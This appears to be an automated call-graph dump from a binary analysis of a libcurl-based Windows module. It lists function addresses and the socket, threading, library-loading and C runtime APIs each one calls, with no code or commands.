curl_mime_filename 21335->21341 21336->21335 21337->21335 21338->21335 21339->21335 21340->21335 21341->21335 21347 6b792ba0 21342->21347 21343 6b792cc6 curl_strequal 21346 6b792cd8 21343->21346 21344 6b792790 curl_mvaprintf 21349 6b792dd0 21344->21349 21345 6b792e9c 21345->21312 21350 6b792d12 21346->21350 21364 6b792790 curl_mvaprintf 21346->21364 21347->21343 21347->21349 21347->21350 21349->21345 21351 6b792790 curl_mvaprintf 21349->21351 21353 6b792e24 21349->21353 21350->21344 21350->21345 21350->21349 21351->21353 21352 6b792b70 curl_mvaprintf 21352->21353 21353->21345 21353->21352 21357 6b792ec0 __fassign 21354->21357 21355 6b79320b 21355->21312 21356 6b7942b0 75 API calls 21356->21357 21357->21355 21357->21356 21366 6b7c219b 21357->21366 21472 6b793470 21359->21472 21362 6b79280f curl_slist_free_all 21363 6b79281a __fassign 21362->21363 21363->21308 21365 6b7927ac 21364->21365 21365->21350 21367 6b7c21a7 __fassign 21366->21367 21368 6b7c21c6 21367->21368 21369 6b7c21b1 21367->21369 21375 6b7c21c1 21368->21375 21379 6b7c20fc EnterCriticalSection 21368->21379 21370 6b7c1f49 __dosmaperr 14 API calls 21369->21370 21371 6b7c21b6 21370->21371 21373 6b7cf18d __fassign 25 API calls 21371->21373 21373->21375 21374 6b7c21e3 21380 6b7c2124 21374->21380 21375->21357 21377 6b7c21ee 21396 6b7c2215 21377->21396 21379->21374 21381 6b7c2146 21380->21381 21382 6b7c2131 21380->21382 21384 6b7cae11 70 API calls 21381->21384 21394 6b7c2141 21381->21394 21383 6b7c1f49 __dosmaperr 14 API calls 21382->21383 21385 6b7c2136 21383->21385 21386 6b7c215b 21384->21386 21387 6b7cf18d __fassign 25 API calls 21385->21387 21399 6b7cfe5e 21386->21399 21387->21394 21390 6b7d0094 25 API calls 21391 6b7c2169 21390->21391 21403 6b7ccf7a 21391->21403 21394->21377 21395 6b7cf7ea _free 14 API calls 21395->21394 21471 6b7c2110 LeaveCriticalSection 21396->21471 21398 6b7c221d 21398->21375 21400 6b7c2163 21399->21400 21401 6b7cfe75 21399->21401 21400->21390 21401->21400 21402 6b7cf7ea _free 14 API calls 21401->21402 21402->21400 21404 6b7ccf8b 21403->21404 21405 6b7ccfa0 21403->21405 21406 6b7c1f36 __dosmaperr 14 API calls 21404->21406 21407 6b7ccfe9 21405->21407 21410 6b7ccfc7 21405->21410 21409 6b7ccf90 21406->21409 21408 6b7c1f36 __dosmaperr 14 API calls 21407->21408 21411 6b7ccfee 21408->21411 21412 6b7c1f49 __dosmaperr 14 API calls 21409->21412 21418 6b7cceee 21410->21418 21414 6b7c1f49 __dosmaperr 14 API calls 21411->21414 21415 6b7c216f 21412->21415 21416 6b7ccff6 21414->21416 21415->21394 21415->21395 21417 6b7cf18d __fassign 25 API calls 21416->21417 21417->21415 21419 6b7ccefa __fassign 21418->21419 21429 6b7d16ba EnterCriticalSection 21419->21429 21421 6b7ccf08 21422 6b7ccf2f 21421->21422 21423 6b7ccf3a 21421->21423 21430 6b7cd007 21422->21430 21424 6b7c1f49 __dosmaperr 14 API calls 21423->21424 21426 6b7ccf35 21424->21426 21445 6b7ccf6e 21426->21445 21429->21421 21448 6b7d1936 21430->21448 21432 6b7cd01d 21461 6b7d18a5 21432->21461 21434 6b7cd017 21434->21432 21435 6b7d1936 25 API calls 21434->21435 21444 6b7cd04f 21434->21444 21439 6b7cd046 21435->21439 21436 6b7d1936 25 API calls 21444->21432 21444->21436 21470 6b7d176f LeaveCriticalSection 21445->21470 21447 6b7ccf57 21447->21415 21449 6b7d1958 21448->21449 21450 6b7d1943 21448->21450 21453 6b7c1f36 __dosmaperr 14 API calls 21449->21453 21455 6b7d197d 21449->21455 21451 6b7c1f36 __dosmaperr 14 API calls 21450->21451 21452 6b7d1948 21451->21452 21454 6b7c1f49 __dosmaperr 14 API calls 21452->21454 21456 6b7d1988 21453->21456 21457 6b7d1950 21454->21457 21455->21434 21458 6b7c1f49 __dosmaperr 14 API calls 21456->21458 21457->21434 21459 6b7d1990 21458->21459 21460 6b7cf18d __fassign 25 API calls 21459->21460 21460->21457 21462 6b7d191b 21461->21462 21463 6b7d18b4 21461->21463 21463->21462 21470->21447 21471->21398 21473 6b7927fe curl_slist_free_all 21472->21473 21473->21362 21473->21363 22883 6b779ff0 22884 6b781ce0 106 API calls 22883->22884 22885 6b779ffd 22884->22885 22892 6b781d40 22885->22892 22887 6b77a003 __fassign 22897 6b781f20 22887->22897 22889 6b77a01c __fassign 22890 6b786db0 curl_slist_free_all 22889->22890 22891 6b77a035 22890->22891 22893 6b781d54 22892->22893 22894 6b7927fe curl_slist_free_all 22893->22894 22895 6b79280f curl_slist_free_all 22894->22895 22896 6b79281a __fassign 22894->22896 22895->22896 22896->22887 22898 6b781f30 22897->22898 22899 6b7bcb20 curl_getenv 22898->22899 22900 6b7820bd 22899->22900 22900->22889 19547 6b772a60 19548 6b772a9d 19547->19548 19549 6b7ae5d0 2 API calls 19548->19549 19551 6b772ac8 19549->19551 19550 6b772c83 19552 6b7a05d0 74 API calls 19550->19552 19551->19550 19559 6b772b15 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19551->19559 19553 6b772c90 19552->19553 19554 6b772c55 19555 6b7969d0 76 API calls 19554->19555 19557 6b772c59 19554->19557 19556 6b772c77 19555->19556 19559->19554 19560 6b7740c0 19559->19560 19561 6b774138 __fassign 19560->19561 19562 6b7741af socket 19561->19562 19564 6b77417c 19561->19564 19562->19564 19563 6b7741e3 19648 6b772840 19563->19648 19564->19563 19647 6b774512 19564->19647 19661 6b79a660 ioctlsocket 19564->19661 19565 6b7bdb71 __fassign 5 API calls 19568 6b774524 19565->19568 19568->19559 19569 6b77420b 19570 6b774267 19569->19570 19571 6b774212 19569->19571 19573 6b7a06b0 74 API calls 19570->19573 19572 6b7c1f49 __dosmaperr 14 API calls 19571->19572 19574 6b774217 19572->19574 19575 6b77427c 19573->19575 19576 6b7c1f49 __dosmaperr 14 API calls 19574->19576 19577 6b7742fb 19575->19577 19579 6b7742a8 setsockopt 19575->19579 19578 6b77421e 19576->19578 19592 6b77433a 19577->19592 19680 6b7b4f30 19577->19680 19662 6b7aa0e0 GetLastError 19578->19662 19579->19577 19581 6b7742d2 WSAGetLastError 19579->19581 19585 6b7aa0e0 53 API calls 19581->19585 19582 6b774232 19586 6b7a05d0 74 API calls 19582->19586 19583 6b77435e getsockopt 19588 6b774381 19583->19588 19589 6b77438f setsockopt 19583->19589 19584 6b774341 19594 6b7743c3 setsockopt 19584->19594 19600 6b7743f4 19584->19600 19590 6b7742ea 19585->19590 19591 6b774245 19586->19591 19588->19584 19588->19589 19589->19584 19595 6b7a06b0 74 API calls 19590->19595 19596 6b7728e0 closesocket 19591->19596 19592->19583 19592->19584 19593 6b7744bf 19599 6b7744d6 19593->19599 19603 6b77454c 19593->19603 19597 6b7743e8 19594->19597 19607 6b7743fc 19594->19607 19595->19577 19598 6b774251 19596->19598 19601 6b7a06b0 74 API calls 19597->19601 19602 6b7bdb71 __fassign 5 API calls 19598->19602 19690 6b7739a0 19599->19690 19600->19593 19620 6b77452c 19600->19620 19601->19600 19604 6b774263 19602->19604 19660 6b79a660 ioctlsocket 19603->19660 19604->19559 19606 6b774554 19610 6b7ae5d0 2 API calls 19606->19610 19611 6b77442e WSAIoctl 19607->19611 19609 6b7744f0 19609->19603 19612 6b7744fd 19609->19612 19613 6b774560 19610->19613 19611->19600 19614 6b77446b WSAGetLastError 19611->19614 19615 6b7728e0 closesocket 19612->19615 19618 6b7969d0 76 API calls 19613->19618 19632 6b77459e 19613->19632 19616 6b7a06b0 74 API calls 19614->19616 19617 6b774504 19615->19617 19616->19600 19617->19647 19621 6b77458a 19618->19621 19619 6b77467b 19624 6b7bdb71 __fassign 5 API calls 19619->19624 19623 6b7728e0 closesocket 19620->19623 19625 6b7969d0 76 API calls 19621->19625 19622 6b7745bb 19626 6b774604 WSAGetLastError 19622->19626 19627 6b7745c4 connect 19622->19627 19628 6b774533 19623->19628 19629 6b774692 19624->19629 19625->19632 19630 6b774615 19626->19630 19631 6b774660 19626->19631 19627->19626 19633 6b7745dd 19627->19633 19634 6b7bdb71 __fassign 5 API calls 19628->19634 19629->19559 19630->19631 19635 6b774623 19630->19635 19636 6b7bdb71 __fassign 5 API calls 19631->19636 19632->19619 19632->19622 19637 6b7745eb 19633->19637 19633->19647 19638 6b774548 19634->19638 19639 6b7aa0e0 53 API calls 19635->19639 19640 6b774677 19636->19640 19641 6b7bdb71 __fassign 5 API calls 19637->19641 19638->19559 19642 6b774635 19639->19642 19640->19559 19643 6b774600 19641->19643 19644 6b7a06b0 74 API calls 19642->19644 19643->19559 19645 6b774645 19644->19645 19646 6b7728e0 closesocket 19645->19646 19646->19647 19647->19565 19649 6b772886 19648->19649 19650 6b772853 19648->19650 19651 6b791080 21 API calls 19649->19651 19652 6b7728b4 19650->19652 19757 6b791080 19650->19757 19653 6b772894 19651->19653 19654 6b7c1f49 __dosmaperr 14 API calls 19652->19654 19653->19652 19657 6b77289b htons 19653->19657 19658 6b7728c5 19654->19658 19656 6b772866 19656->19652 19659 6b77286d htons 19656->19659 19657->19569 19658->19569 19659->19569 19660->19606 19661->19563 19663 6b7c1f49 __dosmaperr 14 API calls 19662->19663 19665 6b7aa0f5 19663->19665 19664 6b7aa101 19664->19582 19665->19664 19666 6b7aa137 19665->19666 19667 6b7aa121 19665->19667 19672 6b7aa128 _strncpy _strrchr 19666->19672 19800 6b7aa770 19666->19800 19792 6b7c958e 19667->19792 19671 6b7aa155 curl_msnprintf 19671->19672 19673 6b7c1f49 __dosmaperr 14 API calls 19672->19673 19674 6b7aa1a5 19673->19674 19675 6b7aa1b3 GetLastError 19674->19675 19676 6b7c1f49 __dosmaperr 14 API calls 19674->19676 19677 6b7aa1c0 SetLastError 19675->19677 19678 6b7aa1c7 19675->19678 19679 6b7aa1b1 19676->19679 19677->19678 19678->19582 19679->19675 19681 6b7b5069 19680->19681 19684 6b7b4f56 __fassign 19680->19684 19682 6b7bdb71 __fassign 5 API calls 19681->19682 19683 6b7b5075 19682->19683 19683->19592 19685 6b7b4ff8 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 19684->19685 19686 6b7b502c VerSetConditionMask 19685->19686 19687 6b7b5034 VerifyVersionInfoA 19685->19687 19686->19687 19688 6b7bdb71 __fassign 5 API calls 19687->19688 19689 6b7b5065 19688->19689 19689->19592 19692 6b7739f2 __fassign 19690->19692 19691 6b773ee6 19693 6b7bdb71 __fassign 5 API calls 19691->19693 19692->19691 19694 6b773d51 19692->19694 19721 6b773a35 __fassign 19692->19721 19695 6b773f05 19693->19695 19696 6b773d7b 19694->19696 19697 6b773d59 htons 19694->19697 19695->19609 19698 6b773d80 htons 19696->19698 19747 6b773bc6 19696->19747 19699 6b773da4 bind 19697->19699 19698->19699 19700 6b773e0c __fassign 19699->19700 19701 6b773db9 19699->19701 19703 6b773e29 getsockname 19700->19703 19702 6b773e91 WSAGetLastError 19701->19702 19705 6b7a06b0 74 API calls 19701->19705 19704 6b7aa0e0 53 API calls 19702->19704 19706 6b773ed7 19703->19706 19707 6b773e4b WSAGetLastError 19703->19707 19708 6b773eb1 19704->19708 19709 6b773de4 htons bind 19705->19709 19710 6b7a06b0 74 API calls 19706->19710 19711 6b7aa0e0 53 API calls 19707->19711 19712 6b7a05d0 74 API calls 19708->19712 19709->19700 19709->19701 19710->19691 19713 6b773e6b 19711->19713 19714 6b773ebe 19712->19714 19715 6b7a05d0 74 API calls 19713->19715 19716 6b7bdb71 __fassign 5 API calls 19714->19716 19717 6b773e78 19715->19717 19719 6b773ed3 19716->19719 19718 6b7bdb71 __fassign 5 API calls 19717->19718 19720 6b773e8d 19718->19720 19719->19609 19720->19609 19722 6b773aa2 curl_pushheader_bynum 19721->19722 19727 6b773ae5 19721->19727 19723 6b773bd6 19722->19723 19724 6b773ad3 19722->19724 19726 6b773be3 19723->19726 19723->19727 19725 6b773cbe 19724->19725 19724->19727 19729 6b773b6d 19724->19729 19728 6b7bdb71 __fassign 5 API calls 19725->19728 19730 6b7a05d0 74 API calls 19726->19730 19733 6b773d25 19727->19733 20084 6b7884a0 19727->20084 19731 6b773cd0 19728->19731 19732 6b7a06b0 74 API calls 19729->19732 19734 6b773bef 19730->19734 19731->19609 19737 6b773b83 19732->19737 19738 6b7a05d0 74 API calls 19733->19738 19735 6b7bdb71 __fassign 5 API calls 19734->19735 19739 6b773c04 19735->19739 19742 6b773cd4 19737->19742 19743 6b773b92 inet_pton 19737->19743 19741 6b773d38 19738->19741 19739->19609 19744 6b7bdb71 __fassign 5 API calls 19741->19744 19745 6b773cdd inet_pton 19742->19745 19742->19747 19743->19747 19748 6b773bac htons 19743->19748 19750 6b773d4d 19744->19750 19745->19747 19751 6b773cfb htons 19745->19751 19747->19699 19748->19747 19750->19609 19751->19699 19758 6b79108b 19757->19758 19759 6b7910b2 19757->19759 19761 6b79109f 19758->19761 19762 6b791090 19758->19762 19782 6b7910d0 curl_msnprintf 19759->19782 19768 6b791170 19761->19768 19764 6b7c1f49 __dosmaperr 14 API calls 19762->19764 19763 6b7910c0 19763->19656 19767 6b791095 19764->19767 19766 6b7910ad 19766->19656 19767->19656 19770 6b7911a0 19768->19770 19769 6b7912ed curl_msnprintf 19769->19770 19770->19769 19771 6b79135e 19770->19771 19775 6b79130c 19770->19775 19772 6b7910d0 20 API calls 19771->19772 19772->19775 19773 6b791378 19776 6b7c1f49 __dosmaperr 14 API calls 19773->19776 19774 6b79132d 19779 6b7bdb71 __fassign 5 API calls 19774->19779 19775->19773 19775->19774 19777 6b79137d 19776->19777 19778 6b7bdb71 __fassign 5 API calls 19777->19778 19780 6b791392 19778->19780 19781 6b79135a 19779->19781 19780->19766 19781->19766 19783 6b791117 19782->19783 19783->19783 19784 6b791150 19783->19784 19787 6b791127 19783->19787 19785 6b7c1f49 __dosmaperr 14 API calls 19784->19785 19786 6b791155 19785->19786 19788 6b7bdb71 __fassign 5 API calls 19786->19788 19789 6b7bdb71 __fassign 5 API calls 19787->19789 19790 6b791168 19788->19790 19791 6b79114c 19789->19791 19790->19763 19791->19763 19798 6b7c94f5 19792->19798 19793 6b7cf692 __dosmaperr 14 API calls 19793->19798 19794 6b7c9550 19794->19672 19795 6b7cf78d __dosmaperr 14 API calls 19795->19798 19797 6b7cf7ea _free 14 API calls 19797->19798 19798->19792 19798->19793 19798->19794 19798->19795 19798->19797 19799 6b7cf19d __fassign 11 API calls 19798->19799 19807 6b7d23e1 19798->19807 19799->19798 19801 6b7aa7ce ___from_strstr_to_strchr 19800->19801 19802 6b7aa791 FormatMessageW 19800->19802 19803 6b7bdb71 __fassign 5 API calls 19801->19803 19802->19801 19804 6b7aa7bd 19802->19804 19805 6b7aa14e 19803->19805 19816 6b7cb225 19804->19816 19805->19671 19805->19672 19809 6b7d232e 19807->19809 19808 6b7d2346 19810 6b7d235a 19808->19810 19811 6b7c1f49 __dosmaperr 14 API calls 19808->19811 19809->19808 19809->19810 19814 6b7d237e 19809->19814 19810->19798 19812 6b7d2350 19811->19812 19813 6b7cf18d __fassign 25 API calls 19812->19813 19813->19810 19814->19810 19815 6b7c1f49 __dosmaperr 14 API calls 19814->19815 19815->19812 19819 6b7caf7c 19816->19819 19820 6b7caf88 __fassign 19819->19820 19821 6b7cafa4 19820->19821 19822 6b7cafaf 19820->19822 19823 6b7cafc7 19820->19823 19868 6b7d9f78 19821->19868 19824 6b7c1f49 __dosmaperr 14 API calls 19822->19824 19849 6b7c37b2 19823->19849 19827 6b7cafb4 19824->19827 19830 6b7cf18d __fassign 25 API calls 19827->19830 19830->19821 19831 6b7cb002 19833 6b7cb1a9 19831->19833 19834 6b7cb00a 19831->19834 19832 6b7cafe3 19857 6b7d2ff3 19832->19857 19836 6b7d2f46 __fassign WideCharToMultiByte 19833->19836 19839 6b7cb1b1 19833->19839 19837 6b7cb0b3 19834->19837 19841 6b7cb012 19834->19841 19844 6b7cb052 19834->19844 19836->19839 19838 6b7d2f46 __fassign WideCharToMultiByte 19837->19838 19842 6b7cb0c6 19838->19842 19839->19821 19845 6b7c1f49 __dosmaperr 14 API calls 19839->19845 19841->19821 19843 6b7c1f49 __dosmaperr 14 API calls 19841->19843 19842->19841 19846 6b7cb0eb GetLastError 19842->19846 19843->19821 19865 6b7d2f46 19844->19865 19845->19821 19846->19841 19848 6b7cb0fa 19846->19848 19847 6b7d2f46 __fassign WideCharToMultiByte 19847->19848 19848->19821 19848->19839 19848->19847 19850 6b7c37c9 19849->19850 19851 6b7c37d2 19849->19851 19850->19831 19850->19832 19851->19850 19871 6b7cf53b GetLastError 19851->19871 19859 6b7d30b3 19857->19859 19864 6b7d3024 __fassign 19857->19864 19858 6b7d80fd __fassign 14 API calls 19858->19859 19859->19858 19863 6b7d3090 19859->19863 19861 6b7bdb71 __fassign 5 API calls 19862 6b7d30ef 19861->19862 19862->19821 19863->19861 19864->19863 20066 6b7d80fd 19864->20066 19867 6b7d2f5f WideCharToMultiByte 19865->19867 19867->19841 19869 6b7bdb71 __fassign 5 API calls 19868->19869 19870 6b7cb224 19869->19870 19870->19801 19872 6b7cf558 19871->19872 19873 6b7cf552 19871->19873 19875 6b7cfb8f __dosmaperr 6 API calls 19872->19875 19897 6b7cf55e SetLastError 19872->19897 19874 6b7cfb50 __dosmaperr 6 API calls 19873->19874 19874->19872 19876 6b7cf576 19875->19876 19877 6b7cf78d __dosmaperr 14 API calls 19876->19877 19876->19897 19878 6b7cf586 19877->19878 19880 6b7cf58e 19878->19880 19881 6b7cf5a5 19878->19881 19884 6b7cfb8f __dosmaperr 6 API calls 19880->19884 19886 6b7cfb8f __dosmaperr 6 API calls 19881->19886 19882 6b7c37f2 19898 6b7d09a3 19882->19898 19883 6b7cf5f2 19906 6b7cef63 19883->19906 19887 6b7cf59c 19884->19887 19889 6b7cf5b1 19886->19889 19892 6b7cf7ea _free 14 API calls 19887->19892 19890 6b7cf5b5 19889->19890 19891 6b7cf5c6 19889->19891 19892->19897 19897->19882 19897->19883 19899 6b7c3808 19898->19899 19900 6b7d09b6 19898->19900 19902 6b7d09d0 19899->19902 19900->19899 19976 6b7d53df 19900->19976 19903 6b7d09e3 19902->19903 19905 6b7d09f8 19902->19905 19903->19905 19998 6b7d40c5 19903->19998 19905->19850 19917 6b7d49fd 19906->19917 19950 6b7d492f 19917->19950 19951 6b7d493b __fassign 19950->19951 19952 6b7d2dc8 __fassign EnterCriticalSection 19951->19952 19953 6b7d4949 19952->19953 19977 6b7d53eb __fassign 19976->19977 19978 6b7cf53b __fassign 37 API calls 19977->19978 19979 6b7d53f4 19978->19979 19999 6b7cf53b __fassign 37 API calls 19998->19999 20067 6b7d8113 20066->20067 20068 6b7d8126 20067->20068 20069 6b7d8162 20067->20069 20071 6b7d8130 20068->20071 20074 6b7d8139 20068->20074 20070 6b7d816c 20069->20070 20069->20071 20072 6b7d5725 __fassign 14 API calls 20070->20072 20077 6b7d5706 20071->20077 20076 6b7d8136 20072->20076 20074->20076 20080 6b7d5725 20074->20080 20076->19864 20078 6b7c1f49 __dosmaperr 14 API calls 20077->20078 20079 6b7d571a 20078->20079 20079->20076 20081 6b7d565b 20080->20081 20082 6b7d5706 __fassign 14 API calls 20081->20082 20083 6b7d5667 20081->20083 20082->20083 20083->20076 20085 6b7884e7 20084->20085 20130 6b788840 20085->20130 20087 6b7884ff 20088 6b7a06b0 74 API calls 20087->20088 20104 6b788515 20087->20104 20088->20104 20089 6b788589 inet_pton 20091 6b7885b9 inet_pton 20089->20091 20092 6b78859a 20089->20092 20090 6b7bdb71 __fassign 5 API calls 20093 6b788679 20090->20093 20095 6b7885ca 20091->20095 20099 6b7885d9 20091->20099 20146 6b776fb0 20092->20146 20100 6b7886cf 20099->20100 20102 6b7bdb71 __fassign 5 API calls 20100->20102 20105 6b7886df 20102->20105 20103 6b788656 20103->20090 20104->20089 20104->20100 20104->20103 20235 6b7887e0 20130->20235 20132 6b788873 20133 6b788997 20132->20133 20139 6b7888e0 20132->20139 20239 6b7c94c5 20132->20239 20135 6b7bdb71 __fassign 5 API calls 20133->20135 20138 6b7889a6 20135->20138 20136 6b7c6edc 26 API calls 20140 6b788922 20136->20140 20138->20087 20139->20133 20139->20136 20139->20139 20140->20133 20141 6b788966 20140->20141 20142 6b7a06b0 74 API calls 20141->20142 20143 6b788971 20142->20143 20144 6b7bdb71 __fassign 5 API calls 20143->20144 20145 6b788993 20144->20145 20145->20087 20237 6b7887f0 20235->20237 20236 6b788825 curl_msnprintf 20236->20132 20237->20236 20238 6b7c94c5 47 API calls 20237->20238 20238->20237 20240 6b7c94d3 20239->20240 20242 6b7888b8 curl_msnprintf 20239->20242 20243 6b7c93c1 20240->20243 20242->20139 20244 6b7c93d8 20243->20244 20252 6b7c93ed 20243->20252 20245 6b7c37b2 __fassign 47 API calls 20244->20245 20246 6b7c93e4 20245->20246 20247 6b7c9439 20246->20247 20246->20252 20253 6b7d20a1 20246->20253 20249 6b7c1f49 __dosmaperr 14 API calls 20247->20249 20250 6b7c943f 20247->20250 20249->20250 20252->20242 20254 6b7c37b2 __fassign 47 API calls 20253->20254 21298 6b7a07e0 recv 21299 6b7a07fb WSAGetLastError 21298->21299 21300 6b7a081e 21298->21300 18987 6b771050 18988 6b77108f 18987->18988 18989 6b77107b 18987->18989 19017 6b7ae5d0 18988->19017 19010 6b788a20 18989->19010 18992 6b77118c 18993 6b7c1f49 __dosmaperr 14 API calls 18992->18993 18995 6b7711a7 18993->18995 18994 6b7710c6 __fassign 18994->18992 18998 6b771179 18994->18998 18999 6b771158 InitializeCriticalSectionEx 18994->18999 19049 6b7a05d0 18995->19049 19044 6b771670 18998->19044 19021 6b7a6d50 socket 18999->19021 19002 6b771172 19002->18998 19003 6b7711df 19002->19003 19009 6b77122d 19003->19009 19041 6b779120 19003->19041 19007 6b771240 19008 6b7c1f49 __dosmaperr 14 API calls 19008->19009 19061 6b7715c0 19009->19061 19011 6b788a2a 19010->19011 19012 6b788a37 socket 19010->19012 19011->18988 19013 6b788a48 19012->19013 19014 6b788a4c 19012->19014 19013->18988 19072 6b7728e0 19014->19072 19016 6b788a54 19016->18988 19018 6b7ae642 GetTickCount 19017->19018 19019 6b7ae5e0 QueryPerformanceCounter 19017->19019 19018->18994 19020 6b7ae603 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19019->19020 19020->18994 19022 6b7a6d8d htonl setsockopt 19021->19022 19023 6b7a6f21 19021->19023 19024 6b7a6f0f closesocket closesocket closesocket 19022->19024 19025 6b7a6ddc bind 19022->19025 19026 6b7bdb71 __fassign 5 API calls 19023->19026 19024->19023 19025->19024 19027 6b7a6df2 getsockname 19025->19027 19028 6b7a6f31 19026->19028 19027->19024 19029 6b7a6e0a listen 19027->19029 19028->19002 19029->19024 19030 6b7a6e1c socket 19029->19030 19030->19024 19031 6b7a6e2f connect 19030->19031 19031->19024 19032 6b7a6e45 accept 19031->19032 19032->19024 19033 6b7a6e5c curl_msnprintf 19032->19033 19034 6b7a6e76 19033->19034 19034->19034 19035 6b7a6e7d send 19034->19035 19035->19024 19036 6b7a6e92 recv 19035->19036 19036->19024 19040 6b7a6ea7 19036->19040 19037 6b7a6ef5 closesocket 19038 6b7bdb71 __fassign 5 API calls 19037->19038 19039 6b7a6f0b 19038->19039 19039->19002 19040->19024 19040->19037 19076 6b7c8360 19041->19076 19043 6b771218 19043->19007 19043->19008 19045 6b77167d DeleteCriticalSection 19044->19045 19046 6b77168c 19044->19046 19045->19046 19047 6b7716b3 closesocket 19046->19047 19048 6b7716ba __fassign 19046->19048 19047->19048 19048->18992 19050 6b7a05fd curl_mvsnprintf 19049->19050 19051 6b7a05f0 19049->19051 19055 6b7a0621 19050->19055 19051->19050 19052 6b7a068b 19051->19052 19053 6b7bdb71 __fassign 5 API calls 19052->19053 19054 6b7711b9 19053->19054 19055->19052 19056 6b7a069d 19055->19056 19057 6b7a0673 19055->19057 19113 6b7bdd5b 19056->19113 19059 6b7a0550 72 API calls 19057->19059 19059->19052 19062 6b7715d0 EnterCriticalSection LeaveCriticalSection 19061->19062 19063 6b771649 19061->19063 19064 6b7715fd 19062->19064 19065 6b771609 19062->19065 19063->18992 19121 6b779150 CloseHandle 19064->19121 19066 6b771614 19065->19066 19122 6b779160 WaitForSingleObjectEx CloseHandle 19065->19122 19069 6b771670 2 API calls 19066->19069 19070 6b771604 19069->19070 19071 6b771641 closesocket 19070->19071 19071->19063 19073 6b77291b closesocket 19072->19073 19074 6b7728ef 19072->19074 19073->19016 19074->19073 19075 6b772928 19074->19075 19075->19016 19077 6b7c836d 19076->19077 19078 6b7c8381 19076->19078 19079 6b7c1f49 __dosmaperr 14 API calls 19077->19079 19091 6b7c8310 19078->19091 19081 6b7c8372 19079->19081 19083 6b7cf18d __fassign 25 API calls 19081->19083 19085 6b7c837d 19083->19085 19084 6b7c8396 CreateThread 19086 6b7c83b5 GetLastError 19084->19086 19089 6b7c83c1 19084->19089 19085->19043 19100 6b7c1f13 19086->19100 19105 6b7c8282 19089->19105 19092 6b7cf78d __dosmaperr 14 API calls 19091->19092 19093 6b7c8321 19092->19093 19094 6b7cf7ea _free 14 API calls 19093->19094 19095 6b7c832e 19094->19095 19096 6b7c8335 GetModuleHandleExW 19095->19096 19097 6b7c8352 19095->19097 19096->19097 19098 6b7c8282 16 API calls 19097->19098 19099 6b7c835a 19098->19099 19099->19084 19099->19089 19101 6b7c1f36 __dosmaperr 14 API calls 19100->19101 19102 6b7c1f1e __dosmaperr 19101->19102 19103 6b7c1f49 __dosmaperr 14 API calls 19102->19103 19104 6b7c1f31 19103->19104 19104->19089 19106 6b7c828e 19105->19106 19107 6b7c82b2 19105->19107 19108 6b7c829d 19106->19108 19109 6b7c8294 CloseHandle 19106->19109 19107->19043 19110 6b7c82ac 19108->19110 19111 6b7c82a3 FreeLibrary 19108->19111 19109->19108 19112 6b7cf7ea _free 14 API calls 19110->19112 19111->19110 19112->19107 19116 6b7bdd67 IsProcessorFeaturePresent 19113->19116 19117 6b7bdd7b 19116->19117 19120 6b7bdc3a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19117->19120 19119 6b7a06a2 19120->19119 19121->19070 19122->19066 19130 6b7716d0 curl_msnprintf 19146 6b776e10 getaddrinfo 19130->19146 19133 6b771722 WSAGetLastError 19135 6b77172c 19133->19135 19136 6b771728 WSAGetLastError 19133->19136 19134 6b771739 EnterCriticalSection 19137 6b771747 LeaveCriticalSection 19134->19137 19138 6b771763 19134->19138 19135->19134 19136->19135 19141 6b771670 2 API calls 19137->19141 19139 6b771787 LeaveCriticalSection 19138->19139 19140 6b77176b send 19138->19140 19143 6b771755 19139->19143 19140->19139 19142 6b771782 WSAGetLastError 19140->19142 19141->19143 19142->19139 19144 6b7bdb71 __fassign 5 API calls 19143->19144 19145 6b7717a5 19144->19145 19148 6b776e3f __fassign 19146->19148 19151 6b771713 19146->19151 19147 6b776f93 WSASetLastError 19147->19151 19148->19147 19149 6b776f4b freeaddrinfo 19148->19149 19150 6b776f52 19148->19150 19149->19150 19150->19147 19150->19151 19151->19133 19151->19134 21129 6b779bc0 21130 6b779bd6 21129->21130 21131 6b779bcd 21129->21131 21133 6b7821a0 16 API calls 21130->21133 21134 6b779be6 21130->21134 21135 6b77a2a0 21131->21135 21133->21134 21136 6b77a2b4 21135->21136 21137 6b77a2b8 21135->21137 21136->21130 21141 6b77a313 21137->21141 21142 6b7aae50 21137->21142 21139 6b77a303 21140 6b77a30a curl_pushheader_bynum 21139->21140 21139->21141 21140->21141 21141->21130 21143 6b7aaea9 21142->21143 21144 6b7aae69 WSAStartup 21142->21144 21172 6b7790c0 21143->21172 21146 6b7aae7f 21144->21146 21147 6b7aae96 21144->21147 21146->21143 21149 6b7aae90 WSACleanup 21146->21149 21150 6b7bdb71 __fassign 5 API calls 21147->21150 21149->21147 21153 6b7aaea5 21150->21153 21151 6b7ab03d 21156 6b7bdb71 __fassign 5 API calls 21151->21156 21152 6b7aaeb6 GetModuleHandleA 21154 6b7aaecb 21152->21154 21155 6b7aaed6 GetProcAddress 21152->21155 21153->21139 21159 6b7b4f30 11 API calls 21154->21159 21157 6b7aaef4 _strpbrk 21155->21157 21158 6b7ab047 21156->21158 21160 6b7aaefb 21157->21160 21161 6b7aaf23 21157->21161 21158->21139 21162 6b7ab022 QueryPerformanceFrequency 21159->21162 21163 6b7aaf11 LoadLibraryA 21160->21163 21171 6b7aaeff 21160->21171 21164 6b7aaf4c GetSystemDirectoryA 21161->21164 21165 6b7aaf27 GetProcAddress 21161->21165 21162->21151 21163->21171 21166 6b7aaf64 21164->21166 21164->21171 21165->21164 21165->21171 21168 6b7aaf77 GetSystemDirectoryA 21166->21168 21166->21171 21167 6b7aaff8 GetProcAddress 21167->21154 21169 6b7aaf88 21168->21169 21168->21171 21170 6b7aafda LoadLibraryA 21169->21170 21169->21171 21170->21171 21171->21154 21171->21167 21173 6b7790c9 21172->21173 21179 6b779107 21172->21179 21174 6b7b4f30 11 API calls 21173->21174 21175 6b7790d6 21174->21175 21180 6b7aacc0 GetModuleHandleA 21175->21180 21177 6b7790eb 21178 6b7790f7 GetProcAddress 21177->21178 21177->21179 21178->21179 21179->21151 21179->21152 21181 6b7aacdb 21180->21181 21182 6b7aace0 GetProcAddress 21180->21182 21181->21177 21183 6b7aad01 _strpbrk 21182->21183 21184 6b7aad08 21183->21184 21185 6b7aad2c 21183->21185 21186 6b7aad1c LoadLibraryA 21184->21186 21190 6b7aad0c 21184->21190 21187 6b7aad30 GetProcAddress 21185->21187 21188 6b7aad55 GetSystemDirectoryA 